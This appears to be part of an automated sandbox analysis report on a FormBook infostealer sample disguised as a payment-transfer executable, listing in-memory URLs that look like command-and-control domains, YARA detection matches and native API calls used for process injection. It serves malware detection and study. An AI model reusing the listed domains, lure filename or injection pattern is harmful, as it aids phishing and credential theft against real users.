          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com/blr/www.na230.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com/blr/www.soheilvaseghi.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com/blr/www.jasa-software.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com/blr/www.zomapa.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site/blr/www.stanchilo.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.siteReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com/blr/www.gannahealing.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com/blr/www.yoshiyama-potager.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com/blr/www.long9000.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.comReferer:
          Source: explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com/blr/www.kathrynbaierling.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com/blr/www.carbeloy.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237111867.0000000000DEB000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          .NET source code contains very large strings
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, LogIn.cs | Long String: Length: 13656
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs | Long String: Length: 13656
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs | Long String: Length: 13656
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, LogIn.cs | Long String: Length: 13656
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, LogIn.cs | Long String: Length: 13656
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00419E8C NtClose,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0102B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0102A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0102AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029560 NtWriteFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0102A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0102A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01029670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010296D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C6AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C6A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C6A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C6B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C6A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C69B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A9E90 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A9F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A9E8C NtClose,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 0_2_028DC2B0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 0_2_028D9990
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0040102F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00401030
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041D146
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0040117A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041E229
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041D4D6
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00402D90
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00409E40
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041D625
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00409E3C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041D73F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01004120
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FFB090
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010A1002
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010120A0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B20A8
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEF900
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B2B28
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101EBB0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B22AE
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B2D07
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B1D55
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01012581
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FF841F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FFD5E0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE0D20
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B1FF1
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01006E30
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B2EF7
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CED466
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C3841F
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF25DD
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C3D5E0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C52581
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF1D55
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF2D07
